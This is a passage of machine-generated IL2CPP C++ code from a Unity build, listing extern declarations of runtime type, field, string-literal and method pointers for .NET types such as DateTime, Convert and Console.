DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F_il2cpp_TypeInfo_var; extern RuntimeClass* DateTimeFormat_t3C1DB338DFB9FCD0D11332F29E5FD9DD79FEE6C8_il2cpp_TypeInfo_var; extern RuntimeClass* DateTimeParse_t657E38D9FF27E5FD6A33E23887031A86248D97D4_il2cpp_TypeInfo_var; extern RuntimeClass* DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132_il2cpp_TypeInfo_var; extern RuntimeClass* Decimal_t44EE9DA309A1BF848308DE4DDFC070CAE6D95EE8_il2cpp_TypeInfo_var; extern RuntimeClass* DictionaryEntry_tB5348A26B94274FCC1DD77185BD5946E283B11A4_il2cpp_TypeInfo_var; extern RuntimeClass* Double_t358B8F23BDC52A5DD700E727E204F9F7CDE12409_il2cpp_TypeInfo_var; extern RuntimeClass* EncodingHelper_t1A078DCE9CF2B3578DA8CAFE03FB9FFABD00EBB3_il2cpp_TypeInfo_var; extern RuntimeClass* Enum_t2AF27C02B8653AE29442467390005ABC74D8F521_il2cpp_TypeInfo_var; extern RuntimeClass* EventArgs_t8E6CA180BE0E56674C6407011A94BAF7C757352E_il2cpp_TypeInfo_var; extern RuntimeClass* FileStream_tA770BF9AF0906644D43C81B962C7DBC3BC79A418_il2cpp_TypeInfo_var; extern RuntimeClass* FormatException_t2808E076CDE4650AF89F55FD78F49290D0EC5BDC_il2cpp_TypeInfo_var; extern RuntimeClass* GC_tC1D7BD74E8F44ECCEF5CD2B5D84BFF9AAE02D01D_il2cpp_TypeInfo_var; extern RuntimeClass* GregorianCalendar_tC611DFF7946345F7AF856B31987FEECB98DEE005_il2cpp_TypeInfo_var; extern RuntimeClass* HebrewNumber_tD97296A15B8A299C729AF74ECE07226395D0655E_il2cpp_TypeInfo_var; extern RuntimeClass* IConsoleDriver_t484163236D7810E338FC3D246EDF2DCAC42C0E37_il2cpp_TypeInfo_var; extern RuntimeClass* IConvertible_tB52671A602A64FCCFD27EA5817E2A6C2B693D380_il2cpp_TypeInfo_var; extern RuntimeClass* IFormattable_t58E0883927AD7B9E881837942BD4FA2E7D8330C0_il2cpp_TypeInfo_var; extern RuntimeClass* IOException_t60E052020EDE4D3075F57A1DCC224FF8864354BA_il2cpp_TypeInfo_var; extern RuntimeClass* Int16_t823A20635DAF5A3D93A1E01CFBF3CBA27CF00B4D_il2cpp_TypeInfo_var; extern RuntimeClass* Int32U5BU5D_t2B9E4FDDDB9F0A00EC0AC631BA2DA915EB1ECF83_il2cpp_TypeInfo_var; extern RuntimeClass* Int32_t585191389E07734F19F3156FF88FB3EF4800D102_il2cpp_TypeInfo_var; extern RuntimeClass* Int64_t7A386C2FF7B0280A0F516992401DDFCF0FF7B436_il2cpp_TypeInfo_var; extern RuntimeClass* InternalCancelHandler_t2DD134D8150B67E2F9FAD1BC2E6BE92EED57968A_il2cpp_TypeInfo_var; extern RuntimeClass* InvalidCastException_t91DF9E7D7FCCDA6C562CB4A9A18903E016680FDA_il2cpp_TypeInfo_var; extern RuntimeClass* InvalidOperationException_t0530E734D823F78310CAFAFA424CA5164D93A1F1_il2cpp_TypeInfo_var; extern RuntimeClass* JapaneseCalendar_tF2E975159C0ADA226D222CE92A068FB01A800E92_il2cpp_TypeInfo_var; extern RuntimeClass* MatchNumberDelegate_t15412AE1CF0D1909CB05C7DBB8079E9281CCA05D_il2cpp_TypeInfo_var; extern RuntimeClass* Math_tFB388E53C7FDC6FCCF9A19ABF5A4E521FBD52E19_il2cpp_TypeInfo_var; extern RuntimeClass* MonoIO_t1C937D98906A6B4CFC3F10BFC69C70F2F70166C6_il2cpp_TypeInfo_var; extern RuntimeClass* NotSupportedException_tE75B318D6590A02A5D9B29FD97409B1750FA0010_il2cpp_TypeInfo_var; extern RuntimeClass* NullConsoleDriver_t4608D1A2E1195946C2945E3459E15364CF4EC43D_il2cpp_TypeInfo_var; extern RuntimeClass* ObjectU5BU5D_t3C9242B5C88A48B2A5BD9FDA6CD0024E792AF08A_il2cpp_TypeInfo_var; extern RuntimeClass* OutOfMemoryException_t2DF3EAC178583BD1DEFAAECBEDB2AF1EA86FBFC7_il2cpp_TypeInfo_var; extern RuntimeClass* OverflowException_tD89571E2350DE06D9DE4AB65ADCA77D607B5693D_il2cpp_TypeInfo_var; extern RuntimeClass* RuntimeObject_il2cpp_TypeInfo_var; extern RuntimeClass* RuntimeTypeU5BU5D_tD8ADAF35960AACE7B524A8DDF0CEAC7D151161FE_il2cpp_TypeInfo_var; extern RuntimeClass* RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F_il2cpp_TypeInfo_var; extern RuntimeClass* SByte_t9070AEA2966184235653CB9B4D33B149CDA831DF_il2cpp_TypeInfo_var; extern RuntimeClass* SerializationException_tA1FDFF6779406E688C2192E71C38DBFD7A4A2210_il2cpp_TypeInfo_var; extern RuntimeClass* Single_tDDDA9169C4E4E308AC6D7A824F9B28DC82204AE1_il2cpp_TypeInfo_var; extern RuntimeClass* StackEnumerator_tAD5D58C2B92BF36AB7BEDF4405635CB160515DDA_il2cpp_TypeInfo_var; extern RuntimeClass* Stack_t37723B68CC4FFD95F0F3D06A5D42D7DEE7569643_il2cpp_TypeInfo_var; extern RuntimeClass* Stream_tFC50657DD5AAB87770987F9179D934A51D99D5E7_il2cpp_TypeInfo_var; extern RuntimeClass* StringBuilder_t_il2cpp_TypeInfo_var; extern RuntimeClass* StringComparer_t588BC7FEF85D6E7425E0A8147A3D5A334F1F82DE_il2cpp_TypeInfo_var; extern RuntimeClass* StringU5BU5D_t933FB07893230EA91C40FF900D5400665E87B14E_il2cpp_TypeInfo_var; extern RuntimeClass* String_t_il2cpp_TypeInfo_var; extern RuntimeClass* TaiwanCalendar_t9531ECDB6DFA9E0D0F4123935DB61D0E97D43658_il2cpp_TypeInfo_var; extern RuntimeClass* TermInfoDriver_t9D1F8B74E923C24C63FBE861B6DDCE7CF05A3653_il2cpp_TypeInfo_var; extern RuntimeClass* TextReader_t7DF8314B601D202ECFEDF623093A87BFDAB58D0A_il2cpp_TypeInfo_var; extern RuntimeClass* TextWriter_t92451D929322093838C41489883D5B2D7ABAF3F0_il2cpp_TypeInfo_var; extern RuntimeClass* TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4_il2cpp_TypeInfo_var; extern RuntimeClass* TimeZone_tA2DF435DA1A379978B885F0872A93774666B7454_il2cpp_TypeInfo_var; extern RuntimeClass* Type_t_il2cpp_TypeInfo_var; extern RuntimeClass* UInt16_tAE45CEF73BF720100519F6867F32145D075F928E_il2cpp_TypeInfo_var; extern RuntimeClass* UInt32_t4980FA09003AFAAB5A6E361BA2748EA9A005709B_il2cpp_TypeInfo_var; extern RuntimeClass* UInt64_tA02DF3B59C8FC4A849BD207DA11038CC64E4CB4E_il2cpp_TypeInfo_var; extern RuntimeClass* UnexceptionalStreamReader_t30F0B3E16EAB998688D1AA23E2A6F3E6590E41EA_il2cpp_TypeInfo_var; extern RuntimeClass* UnexceptionalStreamWriter_t15265DC169F829537681A0A5A1826F6713ABC1CB_il2cpp_TypeInfo_var; extern RuntimeClass* WindowsCancelHandler_t1D05BCFB512603DCF87A126FE9969F1D876B9B51_il2cpp_TypeInfo_var; extern RuntimeClass* WindowsConsoleDriver_t953AB92956013BD3ED7E260FEC4944E603008B42_il2cpp_TypeInfo_var; extern RuntimeClass* WindowsConsole_tE2543F6EAD1001D1F2DE2CC0A5495048EED8C21B_il2cpp_TypeInfo_var; extern RuntimeField* U3CPrivateImplementationDetailsU3E_t5BA0C21499B7A4F7CBCB87805E61EF52DF22771A____0588059ACBD52F7EA2835882F977A9CF72EB9775_1_FieldInfo_var; extern RuntimeField* U3CPrivateImplementationDetailsU3E_t5BA0C21499B7A4F7CBCB87805E61EF52DF22771A____2C840AFA48C27B9C05593E468C1232CA1CC74AFD_16_FieldInfo_var; extern RuntimeField* U3CPrivateImplementationDetailsU3E_t5BA0C21499B7A4F7CBCB87805E61EF52DF22771A____2F71D2DA12F3CD0A6A112F5A5A75B4FDC6FE8547_19_FieldInfo_var; extern RuntimeField* U3CPrivateImplementationDetailsU3E_t5BA0C21499B7A4F7CBCB87805E61EF52DF22771A____34476C29F6F81C989CFCA42F7C06E84C66236834_21_FieldInfo_var; extern RuntimeField* U3CPrivateImplementationDetailsU3E_t5BA0C21499B7A4F7CBCB87805E61EF52DF22771A____375F9AE9769A3D1DA789E9ACFE81F3A1BB14F0D3_23_FieldInfo_var; extern RuntimeField* U3CPrivateImplementationDetailsU3E_t5BA0C21499B7A4F7CBCB87805E61EF52DF22771A____39C9CE73C7B0619D409EF28344F687C1B5C130FE_26_FieldInfo_var; extern RuntimeField* U3CPrivateImplementationDetailsU3E_t5BA0C21499B7A4F7CBCB87805E61EF52DF22771A____3FE6C283BCF384FD2C8789880DFF59664E2AB4A1_30_FieldInfo_var; extern RuntimeField* U3CPrivateImplementationDetailsU3E_t5BA0C21499B7A4F7CBCB87805E61EF52DF22771A____4858DB4AA76D3933F1CA9E6712D4FDB16903F628_35_FieldInfo_var; extern RuntimeField* U3CPrivateImplementationDetailsU3E_t5BA0C21499B7A4F7CBCB87805E61EF52DF22771A____536422B321459B242ADED7240B7447E904E083E3_38_FieldInfo_var; extern RuntimeField* U3CPrivateImplementationDetailsU3E_t5BA0C21499B7A4F7CBCB87805E61EF52DF22771A____5BFE2819B4778217C56416C7585FF0E56EBACD89_46_FieldInfo_var; extern RuntimeField* U3CPrivateImplementationDetailsU3E_t5BA0C21499B7A4F7CBCB87805E61EF52DF22771A____67EEAD805D708D9AA4E14BF747E44CED801744F3_52_FieldInfo_var; extern RuntimeField* U3CPrivateImplementationDetailsU3E_t5BA0C21499B7A4F7CBCB87805E61EF52DF22771A____7341C933A70EAE383CC50C4B945ADB8E08F06737_60_FieldInfo_var; extern RuntimeField* U3CPrivateImplementationDetailsU3E_t5BA0C21499B7A4F7CBCB87805E61EF52DF22771A____94841DD2F330CCB1089BF413E4FA9B04505152E2_76_FieldInfo_var; extern RuntimeField* U3CPrivateImplementationDetailsU3E_t5BA0C21499B7A4F7CBCB87805E61EF52DF22771A____95C48758CAE1715783472FB073AB158AB8A0AB2A_78_FieldInfo_var; extern RuntimeField* U3CPrivateImplementationDetailsU3E_t5BA0C21499B7A4F7CBCB87805E61EF52DF22771A____973417296623D8DC6961B09664E54039E44CA5D8_79_FieldInfo_var; extern RuntimeField* U3CPrivateImplementationDetailsU3E_t5BA0C21499B7A4F7CBCB87805E61EF52DF22771A____A1319B706116AB2C6D44483F60A7D0ACEA543396_84_FieldInfo_var; extern RuntimeField* U3CPrivateImplementationDetailsU3E_t5BA0C21499B7A4F7CBCB87805E61EF52DF22771A____A6732F8E7FC23766AB329B492D6BF82E3B33233F_88_FieldInfo_var; extern RuntimeField* U3CPrivateImplementationDetailsU3E_t5BA0C21499B7A4F7CBCB87805E61EF52DF22771A____AC791C4F39504D1184B73478943D0636258DA7B1_91_FieldInfo_var; extern RuntimeField* U3CPrivateImplementationDetailsU3E_t5BA0C21499B7A4F7CBCB87805E61EF52DF22771A____B9B670F134A59FB1107AF01A9FE8F8E3980B3093_99_FieldInfo_var; extern RuntimeField* U3CPrivateImplementationDetailsU3E_t5BA0C21499B7A4F7CBCB87805E61EF52DF22771A____BEBC9ECC660A13EFC359BA3383411F698CFF25DB_101_FieldInfo_var; extern RuntimeField* U3CPrivateImplementationDetailsU3E_t5BA0C21499B7A4F7CBCB87805E61EF52DF22771A____DD3AEFEADB1CD615F3017763F1568179FEE640B0_117_FieldInfo_var; extern RuntimeField* U3CPrivateImplementationDetailsU3E_t5BA0C21499B7A4F7CBCB87805E61EF52DF22771A____E92B39D8233061927D9ACDE54665E68E7535635A_121_FieldInfo_var; extern RuntimeField* U3CPrivateImplementationDetailsU3E_t5BA0C21499B7A4F7CBCB87805E61EF52DF22771A____EC89C317EA2BF49A70EFF5E89C691E34733D7C37_127_FieldInfo_var; extern RuntimeField* U3CPrivateImplementationDetailsU3E_t5BA0C21499B7A4F7CBCB87805E61EF52DF22771A____F37E34BEADB04F34FCC31078A59F49856CA83D5B_131_FieldInfo_var; extern String_t* _stringLiteral01A3CEF9C82C7345C59662510E0B421C6A6BDCFD; extern String_t* _stringLiteral021710FA7866431C1DACAA6CD31EEEB47DCE64B6; extern String_t* _stringLiteral044F779DD78DC457C66C3F03FB54E04EE4013F70; extern String_t* _stringLiteral05A79F06CF3F67F726DAE68D18A2290F6C9A50C9; extern String_t* _stringLiteral063F5BA07B9A8319201C127A47193BF92C67599A; extern String_t* _stringLiteral07BC1266D48DC029301AB121DA798327931365C6; extern String_t* _stringLiteral0B5A448C29B008BE58461324EB08382F6A1DA419; extern String_t* _stringLiteral0BD33FDF3EDF96B20C8F243E32B177CA52FB1519; extern String_t* _stringLiteral0EEEC4869A9E258F65B3250DEAFDD0D174088EE5; extern String_t* _stringLiteral0EF25AE00F40C8471EE44B720036ABCC25E96CEE; extern String_t* _stringLiteral0F9BA953E35135A3F8EC268817CC92F2557202A9; extern String_t* _stringLiteral180FCBE698D0F2C44101A06215C472930BBD0A01; extern String_t* _stringLiteral19EDC1210777BA4D45049C29280D9CC5E1064C25; extern String_t* _stringLiteral20129DCACE911064DD71D775424F848ED70E9328; extern String_t* _stringLiteral223DE1BFCB7230443EA0B00CBFE02D9443CF6BB1; extern String_t* _stringLiteral250E34D0324F6809D28A6BCC386CC09FE5DB991C; extern String_t* _stringLiteral26EC8D00FB6B55466B3A115F1D559422A7FA7AAC; extern String_t* _stringLiteral2AE9006AA79BCA491D17932D2580DBE509CC1BD7; extern String_t* _stringLiteral2B7B910762F4ACF01D021675EDD9597BFFFC8E82; extern String_t* _stringLiteral2D77BE6D598A0A9376398980E66D10E319F1B52A; extern String_t* _stringLiteral2E2FC55ECA0F95E74B3E4F4CEB108D4486D3F1A6; extern String_t* _stringLiteral2E7074DA7ECD9C7BACE7E75734DE6D1D00895DFE; extern String_t* _stringLiteral314A883D61C1D386E61BE443EB9D3B50BA3FF07D; extern String_t* _stringLiteral3647A113CA9819A53C36BF6083C7027C975BE2B5; extern String_t* _stringLiteral38C1D791DA28CCACA40DF5E093EAB4D67B08C70D; extern String_t* _stringLiteral3908AA3BFE204D9D04F695379736F7C93792A7E9; extern String_t* _stringLiteral39DFA55283318D31AFE5A3FF4A0E3253E2045E43; extern String_t* _stringLiteral3D54973F528B01019A58A52D34D518405A01B891; extern String_t* _stringLiteral40408F06D64C0A4EE51AF41707D5D544083B012D; extern String_t* _stringLiteral421771305044654A8E7CA3285DDD3E840861E121; extern String_t* _stringLiteral42CAA54DEC95448BFC9996931A9ABF8CD93DF00F; extern String_t* _stringLiteral4B7A2452FBAAF02487F5667BCA2E7D64B9707EDC; extern String_t* _stringLiteral4C28A7D98B2E79E88DB5793B92CAC2973807E234; extern String_t* _stringLiteral4E079D0555E5A2B460969C789D3AD968A795921F; extern String_t* _stringLiteral4FA1555162B320F87E718E7D03508690DA6245A7; extern String_t* _stringLiteral4FF0B1538469338A0073E2CDAAB6A517801B6AB4; extern String_t* _stringLiteral50C9E8D5FC98727B4BBC93CF5D64A68DB647F04F; extern String_t* _stringLiteral53A610E925BBC0A175E365D31241AE75AEEAD651; extern String_t* _stringLiteral53CE4A69C239125FEAFB3AAB705BEF29027E8CC9; extern String_t* _stringLiteral55D1BE151653A5C241220EC0C5204A685F6D0FBA; extern String_t* _stringLiteral59BD0A3FF43B32849B319E645D4798D8A5D1E889; extern String_t* _stringLiteral5CE33F32669AF0A628F2E23DF78AE8639C9BCA3C; extern String_t* _stringLiteral5D4EEE7520E3C4D7B6DAAA0FAF98E5446EEC12EF; extern String_t* _stringLiteral5F82205BEDF93F9FC5534E27F6D5798CA8E49C9A; extern String_t* _stringLiteral60C475AA86353C499DE2FA8877E87D44031CE593; extern String_t* _stringLiteral64BBB9C026320FA4502EF597DDC93C8AEED5FA44; extern String_t* _stringLiteral66A2CA93B4D74A9945AF3335F6FDED9B5261D3B4; extern String_t* _stringLiteral672E8F4CE93C075F32B4FD6C0D0EDAC1BDDB9469; extern String_t* _stringLiteral6934105AD50010B814C933314B1DA6841431BC8B; extern String_t* _stringLiteral6972AB6A4112783DFDFEE444146EB3CF741CCD13; extern String_t* _stringLiteral69A99906F5A06EA1BDBFC02E6132D35DE781D3F1; extern String_t* _stringLiteral69C6FA8468D332A8338354A74CE92AA8DA8A642A; extern String_t* _stringLiteral6AA37D3F95B049989169366DE359545DDC19DDC5; extern String_t* _stringLiteral6C5D741642268E1DBC189EC8C48B5474FAFA45E1; extern String_t* _stringLiteral6CD6471277F304FD7D1ADCD50886324343DBE87F; extern String_t* _stringLiteral700336D6AF60425DC8D362092DE4C0FFB8576432; extern String_t* _stringLiteral70B4BB2684C3F8969E2FE9E14B470906FD4CF3C6; extern String_t* _stringLiteral76821F13DAA340E4E5BA76D3FA54F27CA331CCB5; extern String_t* _stringLiteral7779E9DF0BDDB39AD9871F3D3FAF9F9C59A62C5B; extern String_t* _stringLiteral7803EE252527503B67D1EEB0DEB252622746CEBD; extern String_t* _stringLiteral785987648F85190CFDE9EADC69FC7C46FE8A7433; extern String_t* _stringLiteral7982E8C08D84551A97DDE8C3CC98E03FC2D6082C; extern String_t* _stringLiteral7DA9F73A36ABE2E58D56D121E5A7E2C3CF329C27; extern String_t* _stringLiteral81581597044514BF54D4F97266022FC991F3915E; extern String_t* _stringLiteral82237410ED07589538EA563BE12E6D18D81CA295; extern String_t* _stringLiteral84B98C10F6DEA1BB27F4A35E553BA97F41DFF0E2; extern String_t* _stringLiteral858B28677610CF07E111998CCE040F14F5256455; extern String_t* _stringLiteral8982655AE29E9D3137AA597B404ACE4E0F6B958F; extern String_t* _stringLiteral8AEFB06C426E07A0A671A1E2488B4858D694A730; extern String_t* _stringLiteral8D475FBD52CC44C4B3646CB6D42B92B682940C75; extern String_t* _stringLiteral8E235C85706AEC625982AEEA41C686B14E89F326; extern String_t* _stringLiteral8EFD86FB78A56A5145ED7739DCB00C78581C5375; extern String_t* _stringLiteral8F7ECF552BF6FB86CD369CCC08EDC822619395BA; extern String_t* _stringLiteral9071A4CB8E2F99F81D5B117DAE3211B994971FFA; extern String_t* _stringLiteral909F99A779ADB66A76FC53AB56C7DD1CAF35D0FD; extern String_t* _stringLiteral9214C9F24885BBE3A6652B2B74E1F31D7DD4ADF2; extern String_t* _stringLiteral952604412082661142BB4448D6792E048E0317FC; extern String_t* _stringLiteral98CFE5E917B6BC87FA117F28F39F6E8B09499151; extern String_t* _stringLiteral9B30C1BF65712BDA061818365704D06F3871C202; extern String_t* _stringLiteral9B5C0B859FABA061DD60FD8070FCE74FCEE29D0B; extern String_t* _stringLiteralA0F1490A20D0211C997B44BC357E1972DEAB8AE3; extern String_t* _stringLiteralA2B7B795445D4C0C91BF05E16188082D950BF16F; extern String_t* _stringLiteralA36A6718F54524D846894FB04B5B885B4E43E63B; extern String_t* _stringLiteralA581992EF2214628320EFA402E984AF6E5EA8654; extern String_t* _stringLiteralA62F2225BF70BFACCBC7F1EF2A397836717377DE; extern String_t* _stringLiteralA8AF94D5E162CA900D2AEB9CF3E94BF19D8B6A6E; extern String_t* _stringLiteralA980EEDA49322EB9BE88B6480B2BE63B70186B1E; extern String_t* _stringLiteralAA7B479BCC9583E2D72A7A34D71FA9ACF67B076D; extern String_t* _stringLiteralB12EF91185B3724C930E74AF87B78C777D1C701F; extern String_t* _stringLiteralB1681634D48A9755494C96B393FE12BE3E4C2409; extern String_t* _stringLiteralB2DFA6C94FCB93E0645DBB6C79D5282340489A50; extern String_t* _stringLiteralB3337829708B47BA30EF6CB0D62B0BC7364C36F9; extern String_t* _stringLiteralB3DB3AF9A0E0243F28ED20FCC3B1D5D1FAAAFBB6; extern String_t* _stringLiteralB6589FC6AB0DC82CF12099D1C2D40AB994E8410C; extern String_t* _stringLiteralB66A404869995E54B8D48D938E63CA3C7D1C7DCD; extern String_t* _stringLiteralB76FF4906F33C2DD97DDD929B9662BA8CAC6174C; extern String_t* _stringLiteralB858CB282617FB0956D960215C8E84D1CCF909C6; extern String_t* _stringLiteralBA5566E02CA7D0FF07946B5BE9A254A7BA000156; extern String_t* _stringLiteralBDEF35423BEEA3F7C34BDC3E75748DEA59050198; extern String_t* _stringLiteralC984AED014AEC7623A54F0591DA07A85FD4B762D; extern String_t* _stringLiteralCA4CB5523B49D5F62897296F6FCD5ABE68B27A24; extern String_t* _stringLiteralD2F0257C42607F2773F4B8AAB0C017A3B8949322; extern String_t* _stringLiteralD5CFF82A1D6E461A0E147FE9BBEA516963432F4D; extern String_t* _stringLiteralD7F5BC0BFDF8E081DB31E631E37B15C3881B1317; extern String_t* _stringLiteralD84234CE9F95C2DF9A9CB91648DC0629D7B55A78; extern String_t* _stringLiteralDA1DBE1D71E85DD42A6EC593E9C205353A24D35D; extern String_t* _stringLiteralDD1186892A2F5C2BD17CD7D41F90482E39BD02C5; extern String_t* _stringLiteralE21EE77D500910A11959B5AF57FD48D7CF7F326A; extern String_t* _stringLiteralE4C3A2D0CC24A4535EF91791064FFE989CBD382A; extern String_t* _stringLiteralE540CDD1328B2B21E29A95405C301B9313B7C346; extern String_t* _stringLiteralE5559C91F3F57F398B8B547CA356C67FFA1F6497; extern String_t* _stringLiteralE71E7BC3FE9E9F3C39E46B53FFFF0C83D9CC9A36; extern String_t* _stringLiteralE7A77DDE1DCF7766A8F2B41123A23E1C33F262A8; extern String_t* _stringLiteralF1494311E45E6D88177EAF1A6727542529836CC8; extern String_t* _stringLiteralF1E5BAF5ECC3589631088C40CBDD43061976ED8F; extern String_t* _stringLiteralF32B67C7E26342AF42EFABC674D441DCA0A281C5; extern String_t* _stringLiteralF4753A4DEE54EE10A75B28C6D04EB9EA0D19ACCE; extern String_t* _stringLiteralF81B4F09A85F55DDC3FFCA77898383A75640AA15; extern String_t* _stringLiteralFA54022A2807F906EA2A1C207A9347F4A1BEF5AA; extern String_t* _stringLiteralFA6B188D3101E2A5E782C1F0AF6FAFCA10C8BA53; extern String_t* _stringLiteralFAD66767010E09AA6ADD07FA89C43A7F43F44049; extern String_t* _stringLiteralFB2D933A5A8BE5989BECD2E8F00EC57F9D995758; extern String_t* _stringLiteralFB96549631C835EB239CD614CC6B5CB7D295121A; extern const RuntimeMethod* ConsoleKeyInfo__ctor_mF5F427F75CCD5D4BCAADCE6AE31F61D70BD95B98_RuntimeMethod_var; extern const RuntimeMethod* Console_DoConsoleCancelEvent_mBC4C4C488FCE021441F2C1D5A25D86F2F8A94FDD_RuntimeMethod_var; extern const RuntimeMethod* Convert_ChangeType_m249060C66D575F9C00BEE88FB15788CFED9AD492_RuntimeMethod_var; extern const RuntimeMethod* Convert_ChangeType_m4F879F3D17C11FA0B648C99C6D3C42DD33F40926_RuntimeMethod_var; extern const RuntimeMethod* Convert_DefaultToType_m899D5F6B9FE3E8B878BC56172C6BFE788B6C1BE3_RuntimeMethod_var; extern const RuntimeMethod* Convert_FromBase64String_m079F788D000703E8018DA39BE9C05F1CBF60B156_RuntimeMethod_var; extern const RuntimeMethod* Convert_FromBase64_ComputeResultLength_mEE0DB67C66BAFD2BD1738DF94FDDD571E182B622_RuntimeMethod_var; extern const RuntimeMethod* Convert_FromBase64_Decode_mB5184595EE5894141A3943224A628FA9427DBB82_RuntimeMethod_var; extern const RuntimeMethod* Convert_ToBase64String_m86FF376EC650C7A6E85EDD7BCF5BEC23EE5402DF_RuntimeMethod_var; extern const RuntimeMethod* Convert_ToBase64String_mF201749AD724C437524C8A6108519470A0F65B84_RuntimeMethod_var; extern const RuntimeMethod* Convert_ToBase64_CalculateAndValidateOutputLength_m1FAAD592F5E302E59EAB90CB292DD02505C2A0E6_RuntimeMethod_var; extern const RuntimeMethod* Convert_ToByte_m2DDDB2A7442059FE2185B347BB71BF7577781807_RuntimeMethod_var; extern const RuntimeMethod* Convert_ToByte_m4D9F94693332601CE2F1CF8DB9933F7C0FE882B1_RuntimeMethod_var; extern const RuntimeMethod* Convert_ToByte_m5B2E3D791EE1E14A7604D126C24AA62FE2587B60_RuntimeMethod_var; extern const RuntimeMethod* Convert_ToByte_m645FE381788C101B2BE504F57811E655AD432935_RuntimeMethod_var; extern const RuntimeMethod* Convert_ToByte_m7D3D6E8B30620A208FC31EE6C29087EA6FDFF923_RuntimeMethod_var; extern const RuntimeMethod* Convert_ToByte_mBA74300A0EBF60E75A3ABED4AA4AAB62DF40014A_RuntimeMethod_var; extern const RuntimeMethod* Convert_ToByte_mC952E2B42FF6008EF2123228A0BFB9054531EB64_RuntimeMethod_var; extern const RuntimeMethod* Convert_ToByte_mF058F63299585352A96AB211EF4DA55B9996ADA5_RuntimeMethod_var; extern const RuntimeMethod* Convert_ToChar_m56A1099464A288FD3AB6F82B7433DB063F671B29_RuntimeMethod_var; extern const RuntimeMethod* Convert_ToChar_m5A1F3909973CE4894614B7444B430BE562456F8C_RuntimeMethod_var; extern const RuntimeMethod* Convert_ToChar_m5BD134B72978B879B81A824DFAC8FF29F5300245_RuntimeMethod_var; extern const RuntimeMethod* Convert_ToChar_m9171D149D77DE0FBB36CB4D91EEBDC06B2DD6F29_RuntimeMethod_var; extern const RuntimeMethod* Convert_ToChar_m9F32E993218E9D544A9FCC6FE50D6501A838315F_RuntimeMethod_var; extern const RuntimeMethod* Convert_ToChar_mA5935B08EA798B0EFFE6EA960B9F23B43F8F44AF_RuntimeMethod_var; extern const RuntimeMethod* Convert_ToChar_mBFD88FBE8D41F3FEB4049B8EF556C2D996F5F531_RuntimeMethod_var; extern const RuntimeMethod* Convert_ToInt16_m0D8DD7C5E5F85BE27D38E0FBD17411B8682618B3_RuntimeMethod_var; extern const RuntimeMethod* Convert_ToInt16_m452BBDF72FBBBF90915F464E0558DA82CE1F7DBF_RuntimeMethod_var; extern const RuntimeMethod* Convert_ToInt16_m57BC4B92DCAEAA22820CD1915778B407AC23D9C5_RuntimeMethod_var; extern const RuntimeMethod* Convert_ToInt16_mBAB0E578750A2DE0990F9B301C7CBE2397A61A35_RuntimeMethod_var; extern const RuntimeMethod* Convert_ToInt16_mC121EAEA7C8458D987480F1669C6A40082AA93C1_RuntimeMethod_var; extern const RuntimeMethod* Convert_ToInt16_mE8E094D5AD321E5E6756E332116FAF1C084A1CD2_RuntimeMethod_var; extern const RuntimeMethod* Convert_ToInt32_m1A048B98439E87B6AA81AEA091F8F515D3EF730C_RuntimeMethod_var; extern const RuntimeMethod* Convert_ToInt32_m4E8E4BA500C8372D58B20E706C76C8126F7F5260_RuntimeMethod_var; extern const RuntimeMethod* Convert_ToInt32_m5CE30569A0A5B70CBD85954BEEF436F57D6FAE6B_RuntimeMethod_var; extern const RuntimeMethod* Convert_ToInt32_m8DC81C7C49EE4A9334E71E45E3A220644E45B4F4_RuntimeMethod_var; extern const RuntimeMethod* Convert_ToInt32_m966337716B0CC4A45307D82BC21BCA1F8BB22D1C_RuntimeMethod_var; extern const RuntimeMethod* Convert_ToInt64_m396C2B4FA8F12D0C76E0AA3A31872D93BF5EA11D_RuntimeMethod_var; extern const RuntimeMethod* Convert_ToSByte_m0D0A382E0BFF2DAE7019CAB2F6309EB48EFFFD94_RuntimeMethod_var; extern const RuntimeMethod* Convert_ToSByte_m1A4B3CD0081049789B368AE723C5214669A80767_RuntimeMethod_var; extern const RuntimeMethod* Convert_ToSByte_m2BA3408A7B10119B60B923928EFCFA17D3C46D50_RuntimeMethod_var; extern const RuntimeMethod* Convert_ToSByte_m4455F931B18E5D87DE1F99B2686F3D4770E9D177_RuntimeMethod_var; extern const RuntimeMethod* Convert_ToSByte_m5F3E822A40FB8BC9DCE9D39C07D0BFDB5CAE38C3_RuntimeMethod_var; extern const RuntimeMethod* Convert_ToSByte_m65A58DC38CC3A2E7B1D2546EC2FE0803AAB03F34_RuntimeMethod_var; extern const RuntimeMethod* Convert_ToSByte_m750B83AD00E06419AEDFE4436323AF85520E3E00_RuntimeMethod_var; extern const RuntimeMethod* Convert_ToSByte_mCC85C35F01295663A487DDA2C4855C5962ADA2AF_RuntimeMethod_var; extern const RuntimeMethod* Convert_ToUInt16_m19D8F9B74EB5F96C835FA5045E925F000750A8B3_RuntimeMethod_var; extern const RuntimeMethod* Convert_ToUInt16_m3A0BC273AC75E936BBAA48B0D451DB161CEC11CE_RuntimeMethod_var; extern const RuntimeMethod* Convert_ToUInt16_m3BC2069048E0E6C17C6B4C18BFB8FC949739BFFF_RuntimeMethod_var; extern const RuntimeMethod* Convert_ToUInt16_m926B887258078B9BB42574AA2B3F95DC50460EA7_RuntimeMethod_var; extern const RuntimeMethod* Convert_ToUInt16_mA5386907A6E781E3D4261BDB7D6308FBD5B518F7_RuntimeMethod_var; extern const RuntimeMethod* Convert_ToUInt16_mC540754A3F101A7A13FB26FD89836025507E7E80_RuntimeMethod_var; extern const RuntimeMethod* Convert_ToUInt32_m78245CD2AE3D0369F5A99FF013AF73FFBB8CF869_RuntimeMethod_var; extern const RuntimeMethod* Convert_ToUInt32_m7DC544C6EB3CA7920C82A243D9C387B462697BAC_RuntimeMethod_var; extern const RuntimeMethod* Convert_ToUInt32_mA22ABF80925CA54B6B4869939964184C7F344B41_RuntimeMethod_var; extern const RuntimeMethod* Convert_ToUInt32_mB7F4B7176295B3AA240199C4C2E7E59C3B74E6AF_RuntimeMethod_var; extern const RuntimeMethod* Convert_ToUInt32_mC305AB953ECDC1EDEC3F76C2ED9C2898A6A2D8A8_RuntimeMethod_var; extern const RuntimeMethod* Convert_ToUInt32_mD1B91075B4D330E0D2D4600A6D5283C2FA1586E4_RuntimeMethod_var; extern const RuntimeMethod* Convert_ToUInt64_m24AAA55A63E618B389C773AC090EB4F664BFC729_RuntimeMethod_var; extern const RuntimeMethod* 